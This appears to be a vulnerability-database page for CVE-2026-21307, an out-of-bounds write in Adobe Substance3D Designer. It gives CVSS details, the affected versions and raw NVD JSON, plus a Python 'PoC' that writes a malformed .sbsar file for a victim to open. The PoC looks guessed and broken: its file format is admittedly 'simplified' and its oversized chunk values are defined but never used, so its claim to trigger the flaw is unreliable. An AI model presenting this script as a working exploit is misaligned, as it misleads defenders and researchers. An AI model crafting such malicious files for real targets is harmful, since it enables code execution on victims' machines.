Security Vulnerability Report
CVE-2026-21307 CVSS 7.8 HIGH

CVE-2026-21307

Published: 2026-01-13 20:16:10
Last Modified: 2026-01-14 17:57:43

Description

Substance3D - Designer versions 15.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_designer:*:*:*:*:*:*:*:* - VULNERABLE
Adobe Substance3D Designer <= 15.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2026-21307 PoC - Adobe Substance3D Designer Out-of-Bounds Write
# This PoC creates a malformed .sbsar file to trigger the vulnerability
# WARNING: For educational and research purposes only

import struct
import os


def create_malicious_sbsar():
    """
    Create a malicious .sbsar file that triggers OOB write in Adobe Substance3D Designer
    The file structure is based on known sbsar format specifications
    """
    # SBSAR file header (simplified structure)
    header = b'SBSAR'  # Magic bytes
    header += struct.pack('<I', 0x00000001)  # Version
    header += struct.pack('<I', 0x00000001)  # Flags

    # Create malicious data that will trigger OOB write
    # The pattern causes buffer overflow when parsed
    malicious_chunk_size = 0xFFFFFFFF  # Oversized chunk size
    malicious_data = b'\x41' * 0x10000  # Large padding data

    # Malformed package info chunk
    package_header = b'PKGI'  # Package header identifier
    package_size = 0x00001000  # Small size value
    package_data = b'\x00' * package_size

    # Malformed graph chunk with oversized content
    graph_header = b'GRPH'  # Graph identifier
    graph_content = b'\x90' * 0x20000  # Large repeated bytes

    # End marker
    end_marker = b'END\x00'

    # Combine all parts
    sbsar_content = header + package_header + struct.pack('<I', package_size) + package_data
    sbsar_content += graph_header + struct.pack('<I', len(graph_content)) + graph_content
    sbsar_content += end_marker

    return sbsar_content


def save_poc_file(filename='CVE-2026-21307_malicious.sbsar'):
    """Save the PoC file to disk"""
    content = create_malicious_sbsar()
    with open(filename, 'wb') as f:
        f.write(content)
    print(f'[+] PoC file created: {filename}')
    print(f'[+] File size: {len(content)} bytes')
    print('[+] Instructions: Open this file with Adobe Substance3D Designer <= 15.0.3')
    return filename


if __name__ == '__main__':
    save_poc_file()
    print('[+] PoC generation complete')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21307", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:09.763", "lastModified": "2026-01-14T17:57:42.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Designer versions 15.0.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones 15.0.3 y anteriores de Substance3D - Designer están afectadas por una vulnerabilidad de escritura fuera de límites que podría resultar en ejecución de código arbitrario en el contexto del usuario actual. La explotación de este problema requiere interacción del usuario en el sentido de que la víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_designer:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.1.0", "matchCriteriaId": "A490AE76-8B57-4B39-9A8A-0327D3C8E592"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_designer/apsb26-13.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}